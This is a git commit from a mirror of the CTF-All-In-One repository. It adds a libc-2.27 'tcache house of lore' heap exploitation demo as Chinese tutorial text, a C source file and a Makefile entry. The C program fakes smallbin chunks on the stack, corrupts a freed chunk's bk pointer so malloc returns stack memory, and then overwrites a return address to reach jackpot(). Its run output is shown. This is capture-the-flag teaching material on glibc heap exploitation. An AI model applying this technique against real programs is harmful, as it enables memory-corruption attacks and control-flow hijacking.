mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-25 11:41:16 +07:00
add tcache_house_of_lore
This commit is contained in:
parent
9c5d6239c3
commit
b672b21288
@ -672,6 +672,98 @@ READ of size 8 at 0x60c00000bf80 thread T0
|
|||||||
#2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)
|
#2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
最后再给一个 libc-2.27 版本的:
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <stdint.h>
|
||||||
|
|
||||||
|
void jackpot(){ puts("Nice jump d00d"); exit(0); }
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
intptr_t *victim = malloc(0x80);
|
||||||
|
|
||||||
|
// fill the tcache
|
||||||
|
int *a[10];
|
||||||
|
int i;
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
a[i] = malloc(0x80);
|
||||||
|
}
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
free(a[i]);
|
||||||
|
}
|
||||||
|
|
||||||
|
memset(victim, 'A', 0x80);
|
||||||
|
void *p5 = malloc(0x10);
|
||||||
|
memset(p5, 'A', 0x10);
|
||||||
|
intptr_t *victim_chunk = victim - 2;
|
||||||
|
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
|
||||||
|
|
||||||
|
intptr_t* stack_buffer_1[4] = {0};
|
||||||
|
intptr_t* stack_buffer_2[6] = {0};
|
||||||
|
stack_buffer_1[0] = 0;
|
||||||
|
stack_buffer_1[2] = victim_chunk;
|
||||||
|
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
|
||||||
|
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
|
||||||
|
stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin;
|
||||||
|
|
||||||
|
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
|
||||||
|
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
|
||||||
|
|
||||||
|
free((void*)victim);
|
||||||
|
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
|
||||||
|
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
|
||||||
|
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
|
||||||
|
|
||||||
|
void *p2 = malloc(0x100);
|
||||||
|
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
|
||||||
|
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
|
||||||
|
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
|
||||||
|
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
|
||||||
|
|
||||||
|
victim[1] = (intptr_t)stack_buffer_1;
|
||||||
|
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
|
||||||
|
|
||||||
|
void *p3 = malloc(0x40);
|
||||||
|
|
||||||
|
// empty the tcache
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
a[i] = malloc(0x80);
|
||||||
|
}
|
||||||
|
|
||||||
|
char *p4 = malloc(0x80);
|
||||||
|
memset(p4, 'A', 0x10);
|
||||||
|
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
|
||||||
|
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
|
||||||
|
|
||||||
|
intptr_t sc = (intptr_t)jackpot;
|
||||||
|
memcpy((p4+0xa8), &sc, 8);
|
||||||
|
}
|
||||||
|
```
|
||||||
|
```
|
||||||
|
$ gcc -g house_of_lore.c
|
||||||
|
$ ./a.out
|
||||||
|
Allocated the victim (small) chunk: 0x55674d75f260
|
||||||
|
stack_buffer_1: 0x7ffff71fb1d0
|
||||||
|
stack_buffer_2: 0x7ffff71fb1f0
|
||||||
|
|
||||||
|
Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin
|
||||||
|
victim->fd: 0x7f1eba392b00
|
||||||
|
victim->bk: 0x7f1eba392b00
|
||||||
|
|
||||||
|
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700
|
||||||
|
The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin
|
||||||
|
victim->fd: 0x7f1eba392b80
|
||||||
|
victim->bk: 0x7f1eba392b80
|
||||||
|
|
||||||
|
Now emulating a vulnerability that can overwrite the victim->bk pointer
|
||||||
|
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0
|
||||||
|
The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0
|
||||||
|
|
||||||
|
Nice jump d00d
|
||||||
|
```
|
||||||
|
|
||||||
#### overlapping_chunks
|
#### overlapping_chunks
|
||||||
```c
|
```c
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
|
@ -1,4 +1,4 @@
|
|||||||
PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange
|
PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange
|
||||||
CFLAGS += -std=c99 -g
|
CFLAGS += -std=c99 -g
|
||||||
|
|
||||||
# CFLAGS += -fsanitize=address
|
# CFLAGS += -fsanitize=address
|
||||||
|
66
src/others/3.1.6_heap_exploit/tcache_house_of_lore.c
Normal file
66
src/others/3.1.6_heap_exploit/tcache_house_of_lore.c
Normal file
@ -0,0 +1,66 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <stdint.h>
|
||||||
|
|
||||||
|
void jackpot(){ puts("Nice jump d00d"); exit(0); }
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
intptr_t *victim = malloc(0x80);
|
||||||
|
|
||||||
|
// fill the tcache
|
||||||
|
int *a[10];
|
||||||
|
int i;
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
a[i] = malloc(0x80);
|
||||||
|
}
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
free(a[i]);
|
||||||
|
}
|
||||||
|
|
||||||
|
memset(victim, 'A', 0x80);
|
||||||
|
void *p5 = malloc(0x10);
|
||||||
|
memset(p5, 'A', 0x10);
|
||||||
|
intptr_t *victim_chunk = victim - 2;
|
||||||
|
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
|
||||||
|
|
||||||
|
intptr_t* stack_buffer_1[4] = {0};
|
||||||
|
intptr_t* stack_buffer_2[6] = {0};
|
||||||
|
stack_buffer_1[0] = 0;
|
||||||
|
stack_buffer_1[2] = victim_chunk;
|
||||||
|
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
|
||||||
|
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
|
||||||
|
stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin;
|
||||||
|
|
||||||
|
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
|
||||||
|
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
|
||||||
|
|
||||||
|
free((void*)victim);
|
||||||
|
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
|
||||||
|
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
|
||||||
|
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
|
||||||
|
|
||||||
|
void *p2 = malloc(0x100);
|
||||||
|
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
|
||||||
|
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
|
||||||
|
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
|
||||||
|
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
|
||||||
|
|
||||||
|
victim[1] = (intptr_t)stack_buffer_1;
|
||||||
|
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
|
||||||
|
|
||||||
|
void *p3 = malloc(0x40);
|
||||||
|
|
||||||
|
// empty the tcache
|
||||||
|
for (i = 0; i < 7; i++) {
|
||||||
|
a[i] = malloc(0x80);
|
||||||
|
}
|
||||||
|
|
||||||
|
char *p4 = malloc(0x80);
|
||||||
|
memset(p4, 'A', 0x10);
|
||||||
|
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
|
||||||
|
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
|
||||||
|
|
||||||
|
intptr_t sc = (intptr_t)jackpot;
|
||||||
|
memcpy((p4+0xa8), &sc, 8);
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user